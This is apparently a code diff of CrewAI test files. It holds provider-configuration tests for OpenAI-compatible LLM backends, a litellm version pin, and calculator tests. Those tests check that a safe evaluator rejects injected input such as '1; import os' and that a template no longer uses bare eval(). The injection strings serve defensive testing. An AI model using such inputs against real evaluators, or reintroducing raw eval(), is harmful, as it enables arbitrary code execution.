||||
with pytest.raises(SyntaxError):
|
||||
calculator("1; import os")
|
||||
|
||||
def test_rejects_walrus_operator(self):
|
||||
with pytest.raises((ValueError, SyntaxError)):
|
||||
calculator("(x := 42)")
|
||||
|
||||
def test_rejects_boolean_ops(self):
|
||||
with pytest.raises(ValueError):
|
||||
calculator("True and False")
|
||||
|
||||
|
||||
# ---- Template sanity check ----
|
||||
|
||||
|
||||
class TestTemplateDoesNotContainEval:
|
||||
"""Ensure the AGENTS.md template no longer ships raw eval()."""
|
||||
|
||||
def test_no_bare_eval_in_calculator_block(self):
|
||||
source = _extract_calculator_source()
|
||||
# The word "eval" may appear in _safe_eval or ast-related names,
|
||||
# but a bare `eval(` call on its own line must not exist.
|
||||
assert "return str(eval(expression))" not in source
|
||||
|
||||
def test_template_uses_ast_parse(self):
|
||||
source = _extract_calculator_source()
|
||||
assert "ast.parse" in source
|
||||
1
lib/crewai/tests/llms/openai_compatible/__init__.py
Normal file
1
lib/crewai/tests/llms/openai_compatible/__init__.py
Normal file
@@ -0,0 +1 @@
|
||||
"""Tests for OpenAI-compatible providers."""
|
||||
@@ -0,0 +1,310 @@
|
||||
"""Tests for OpenAI-compatible providers."""
|
||||
|
||||
import os
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from crewai.llm import LLM
|
||||
from crewai.llms.providers.openai_compatible.completion import (
|
||||
OPENAI_COMPATIBLE_PROVIDERS,
|
||||
OpenAICompatibleCompletion,
|
||||
ProviderConfig,
|
||||
_normalize_ollama_base_url,
|
||||
)
|
||||
|
||||
|
||||
class TestProviderConfig:
|
||||
"""Tests for ProviderConfig dataclass."""
|
||||
|
||||
def test_provider_config_immutable(self):
|
||||
"""Test that ProviderConfig is immutable (frozen)."""
|
||||
config = ProviderConfig(
|
||||
base_url="https://example.com/v1",
|
||||
api_key_env="TEST_API_KEY",
|
||||
)
|
||||
with pytest.raises(AttributeError):
|
||||
config.base_url = "https://other.com/v1"
|
||||
|
||||
def test_provider_config_defaults(self):
|
||||
"""Test ProviderConfig default values."""
|
||||
config = ProviderConfig(
|
||||
base_url="https://example.com/v1",
|
||||
api_key_env="TEST_API_KEY",
|
||||
)
|
||||
assert config.base_url_env is None
|
||||
assert config.default_headers == {}
|
||||
assert config.api_key_required is True
|
||||
assert config.default_api_key is None
|
||||
|
||||
|
||||
class TestProviderRegistry:
|
||||
"""Tests for the OPENAI_COMPATIBLE_PROVIDERS registry."""
|
||||
|
||||
def test_openrouter_config(self):
|
||||
"""Test OpenRouter provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["openrouter"]
|
||||
assert config.base_url == "https://openrouter.ai/api/v1"
|
||||
assert config.api_key_env == "OPENROUTER_API_KEY"
|
||||
assert config.base_url_env == "OPENROUTER_BASE_URL"
|
||||
assert "HTTP-Referer" in config.default_headers
|
||||
assert config.api_key_required is True
|
||||
|
||||
def test_deepseek_config(self):
|
||||
"""Test DeepSeek provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["deepseek"]
|
||||
assert config.base_url == "https://api.deepseek.com/v1"
|
||||
assert config.api_key_env == "DEEPSEEK_API_KEY"
|
||||
assert config.api_key_required is True
|
||||
|
||||
def test_ollama_config(self):
|
||||
"""Test Ollama provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["ollama"]
|
||||
assert config.base_url == "http://localhost:11434/v1"
|
||||
assert config.api_key_env == "OLLAMA_API_KEY"
|
||||
assert config.base_url_env == "OLLAMA_HOST"
|
||||
assert config.api_key_required is False
|
||||
assert config.default_api_key == "ollama"
|
||||
|
||||
def test_ollama_chat_is_alias(self):
|
||||
"""Test ollama_chat is configured same as ollama."""
|
||||
ollama = OPENAI_COMPATIBLE_PROVIDERS["ollama"]
|
||||
ollama_chat = OPENAI_COMPATIBLE_PROVIDERS["ollama_chat"]
|
||||
assert ollama.base_url == ollama_chat.base_url
|
||||
assert ollama.api_key_required == ollama_chat.api_key_required
|
||||
|
||||
def test_hosted_vllm_config(self):
|
||||
"""Test hosted_vllm provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["hosted_vllm"]
|
||||
assert config.base_url == "http://localhost:8000/v1"
|
||||
assert config.api_key_env == "VLLM_API_KEY"
|
||||
assert config.api_key_required is False
|
||||
assert config.default_api_key == "dummy"
|
||||
|
||||
def test_cerebras_config(self):
|
||||
"""Test Cerebras provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["cerebras"]
|
||||
assert config.base_url == "https://api.cerebras.ai/v1"
|
||||
assert config.api_key_env == "CEREBRAS_API_KEY"
|
||||
assert config.api_key_required is True
|
||||
|
||||
def test_dashscope_config(self):
|
||||
"""Test Dashscope provider configuration."""
|
||||
config = OPENAI_COMPATIBLE_PROVIDERS["dashscope"]
|
||||
assert config.base_url == "https://dashscope-intl.aliyuncs.com/compatible-mode/v1"
|
||||
assert config.api_key_env == "DASHSCOPE_API_KEY"
|
||||
assert config.api_key_required is True
|
||||
|
||||
|
||||
class TestNormalizeOllamaBaseUrl:
|
||||
"""Tests for _normalize_ollama_base_url helper."""
|
||||
|
||||
def test_adds_v1_suffix(self):
|
||||
"""Test that /v1 is added when missing."""
|
||||
assert _normalize_ollama_base_url("http://localhost:11434") == "http://localhost:11434/v1"
|
||||
|
||||
def test_preserves_existing_v1(self):
|
||||
"""Test that existing /v1 is preserved."""
|
||||
assert _normalize_ollama_base_url("http://localhost:11434/v1") == "http://localhost:11434/v1"
|
||||
|
||||
def test_strips_trailing_slash(self):
|
||||
"""Test that trailing slash is handled."""
|
||||
assert _normalize_ollama_base_url("http://localhost:11434/") == "http://localhost:11434/v1"
|
||||
|
||||
def test_handles_v1_with_trailing_slash(self):
|
||||
"""Test /v1/ is normalized."""
|
||||
assert _normalize_ollama_base_url("http://localhost:11434/v1/") == "http://localhost:11434/v1"
|
||||
|
||||
|
||||
class TestOpenAICompatibleCompletion:
|
||||
"""Tests for OpenAICompatibleCompletion class."""
|
||||
|
||||
def test_unknown_provider_raises_error(self):
|
||||
"""Test that unknown provider raises ValueError."""
|
||||
with pytest.raises(ValueError, match="Unknown OpenAI-compatible provider"):
|
||||
OpenAICompatibleCompletion(model="test", provider="unknown_provider")
|
||||
|
||||
def test_missing_required_api_key_raises_error(self):
|
||||
"""Test that missing required API key raises ValueError."""
|
||||
# Clear any existing env var
|
||||
env_key = "DEEPSEEK_API_KEY"
|
||||
original = os.environ.pop(env_key, None)
|
||||
try:
|
||||
with pytest.raises(ValueError, match="API key required"):
|
||||
OpenAICompatibleCompletion(model="deepseek-chat", provider="deepseek")
|
||||
finally:
|
||||
if original:
|
||||
os.environ[env_key] = original
|
||||
|
||||
def test_api_key_from_env(self):
|
||||
"""Test API key is read from environment variable."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key-from-env"}):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="deepseek-chat", provider="deepseek"
|
||||
)
|
||||
assert completion.api_key == "test-key-from-env"
|
||||
|
||||
def test_explicit_api_key_overrides_env(self):
|
||||
"""Test explicit API key overrides environment variable."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "env-key"}):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="deepseek-chat",
|
||||
provider="deepseek",
|
||||
api_key="explicit-key",
|
||||
)
|
||||
assert completion.api_key == "explicit-key"
|
||||
|
||||
def test_default_api_key_for_optional_providers(self):
|
||||
"""Test default API key is used for providers that don't require it."""
|
||||
# Ollama doesn't require API key
|
||||
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
|
||||
assert completion.api_key == "ollama"
|
||||
|
||||
def test_base_url_from_config(self):
|
||||
"""Test base URL is set from provider config."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="deepseek-chat", provider="deepseek"
|
||||
)
|
||||
assert completion.base_url == "https://api.deepseek.com/v1"
|
||||
|
||||
def test_base_url_from_env(self):
|
||||
"""Test base URL is read from environment variable."""
|
||||
with patch.dict(
|
||||
os.environ,
|
||||
{"DEEPSEEK_API_KEY": "test-key", "DEEPSEEK_BASE_URL": "https://custom.deepseek.com/v1"},
|
||||
):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="deepseek-chat", provider="deepseek"
|
||||
)
|
||||
assert completion.base_url == "https://custom.deepseek.com/v1"
|
||||
|
||||
def test_explicit_base_url_overrides_all(self):
|
||||
"""Test explicit base URL overrides env and config."""
|
||||
with patch.dict(
|
||||
os.environ,
|
||||
{"DEEPSEEK_API_KEY": "test-key", "DEEPSEEK_BASE_URL": "https://env.deepseek.com/v1"},
|
||||
):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="deepseek-chat",
|
||||
provider="deepseek",
|
||||
base_url="https://explicit.deepseek.com/v1",
|
||||
)
|
||||
assert completion.base_url == "https://explicit.deepseek.com/v1"
|
||||
|
||||
def test_ollama_base_url_normalized(self):
|
||||
"""Test Ollama base URL is normalized to include /v1."""
|
||||
with patch.dict(os.environ, {"OLLAMA_HOST": "http://custom-ollama:11434"}):
|
||||
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
|
||||
assert completion.base_url == "http://custom-ollama:11434/v1"
|
||||
|
||||
def test_openrouter_headers(self):
|
||||
"""Test OpenRouter has HTTP-Referer header."""
|
||||
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="anthropic/claude-3-opus", provider="openrouter"
|
||||
)
|
||||
assert completion.default_headers is not None
|
||||
assert "HTTP-Referer" in completion.default_headers
|
||||
|
||||
def test_custom_headers_merged_with_defaults(self):
|
||||
"""Test custom headers are merged with provider defaults."""
|
||||
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
|
||||
completion = OpenAICompatibleCompletion(
|
||||
model="anthropic/claude-3-opus",
|
||||
provider="openrouter",
|
||||
default_headers={"X-Custom": "value"},
|
||||
)
|
||||
assert completion.default_headers is not None
|
||||
assert "HTTP-Referer" in completion.default_headers
|
||||
assert completion.default_headers.get("X-Custom") == "value"
|
||||
|
||||
def test_supports_function_calling(self):
|
||||
"""Test that function calling is supported."""
|
||||
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
|
||||
assert completion.supports_function_calling() is True
|
||||
|
||||
|
||||
class TestLLMIntegration:
|
||||
"""Tests for LLM factory integration with OpenAI-compatible providers."""
|
||||
|
||||
def test_llm_creates_openai_compatible_for_deepseek(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for DeepSeek."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
|
||||
llm = LLM(model="deepseek/deepseek-chat")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "deepseek"
|
||||
assert llm.model == "deepseek-chat"
|
||||
|
||||
def test_llm_creates_openai_compatible_for_ollama(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for Ollama."""
|
||||
llm = LLM(model="ollama/llama3")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "ollama"
|
||||
assert llm.model == "llama3"
|
||||
|
||||
def test_llm_creates_openai_compatible_for_openrouter(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for OpenRouter."""
|
||||
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "test-key"}):
|
||||
llm = LLM(model="openrouter/anthropic/claude-3-opus")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "openrouter"
|
||||
# Model should include the full path after provider prefix
|
||||
assert llm.model == "anthropic/claude-3-opus"
|
||||
|
||||
def test_llm_creates_openai_compatible_for_hosted_vllm(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for hosted_vllm."""
|
||||
llm = LLM(model="hosted_vllm/meta-llama/Llama-3-8b")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "hosted_vllm"
|
||||
|
||||
def test_llm_creates_openai_compatible_for_cerebras(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for Cerebras."""
|
||||
with patch.dict(os.environ, {"CEREBRAS_API_KEY": "test-key"}):
|
||||
llm = LLM(model="cerebras/llama3-8b")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "cerebras"
|
||||
|
||||
def test_llm_creates_openai_compatible_for_dashscope(self):
|
||||
"""Test LLM factory creates OpenAICompatibleCompletion for Dashscope."""
|
||||
with patch.dict(os.environ, {"DASHSCOPE_API_KEY": "test-key"}):
|
||||
llm = LLM(model="dashscope/qwen-turbo")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "dashscope"
|
||||
|
||||
def test_llm_with_explicit_provider(self):
|
||||
"""Test LLM with explicit provider parameter."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
|
||||
llm = LLM(model="deepseek-chat", provider="deepseek")
|
||||
assert isinstance(llm, OpenAICompatibleCompletion)
|
||||
assert llm.provider == "deepseek"
|
||||
assert llm.model == "deepseek-chat"
|
||||
|
||||
def test_llm_passes_kwargs_to_completion(self):
|
||||
"""Test LLM passes kwargs to OpenAICompatibleCompletion."""
|
||||
with patch.dict(os.environ, {"DEEPSEEK_API_KEY": "test-key"}):
|
||||
llm = LLM(
|
||||
model="deepseek/deepseek-chat",
|
||||
temperature=0.7,
|
||||
max_tokens=1000,
|
||||
)
|
||||
assert llm.temperature == 0.7
|
||||
assert llm.max_tokens == 1000
|
||||
|
||||
|
||||
class TestCallMocking:
|
||||
"""Tests for mocking the call method."""
|
||||
|
||||
def test_call_method_can_be_mocked(self):
|
||||
"""Test that the call method can be mocked for testing."""
|
||||
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
|
||||
|
||||
with patch.object(completion, "call", return_value="Mocked response"):
|
||||
result = completion.call("Test message")
|
||||
assert result == "Mocked response"
|
||||
|
||||
def test_acall_method_exists(self):
|
||||
"""Test that acall method exists for async calls."""
|
||||
completion = OpenAICompatibleCompletion(model="llama3", provider="ollama")
|
||||
assert hasattr(completion, "acall")
|
||||
assert callable(completion.acall)
|
||||
@@ -211,7 +211,7 @@ def test_llm_passes_additional_params():
|
||||
|
||||
|
||||
def test_get_custom_llm_provider_openrouter():
|
||||
llm = LLM(model="openrouter/deepseek/deepseek-chat")
|
||||
llm = LLM(model="openrouter/deepseek/deepseek-chat", is_litellm=True)
|
||||
assert llm._get_custom_llm_provider() == "openrouter"
|
||||
|
||||
|
||||
@@ -232,7 +232,9 @@ def test_validate_call_params_supported():
|
||||
# Patch supports_response_schema to simulate a supported model.
|
||||
with patch("crewai.llm.supports_response_schema", return_value=True):
|
||||
llm = LLM(
|
||||
model="openrouter/deepseek/deepseek-chat", response_format=DummyResponse
|
||||
model="openrouter/deepseek/deepseek-chat",
|
||||
response_format=DummyResponse,
|
||||
is_litellm=True,
|
||||
)
|
||||
# Should not raise any error.
|
||||
llm._validate_call_params()
|
||||
|
||||
2
uv.lock
generated
2
uv.lock
generated
@@ -1241,7 +1241,7 @@ requires-dist = [
|
||||
{ name = "json5", specifier = "~=0.10.0" },
|
||||
{ name = "jsonref", specifier = "~=1.1.0" },
|
||||
{ name = "lancedb", specifier = ">=0.29.2" },
|
||||
{ name = "litellm", marker = "extra == 'litellm'", specifier = ">=1.74.9,<3" },
|
||||
{ name = "litellm", marker = "extra == 'litellm'", specifier = ">=1.74.9,<=1.82.6" },
|
||||
{ name = "mcp", specifier = "~=1.26.0" },
|
||||
{ name = "mem0ai", marker = "extra == 'mem0'", specifier = "~=0.1.94" },
|
||||
{ name = "openai", specifier = ">=1.83.0,<3" },
|
||||
|
||||
Reference in New Issue
Block a user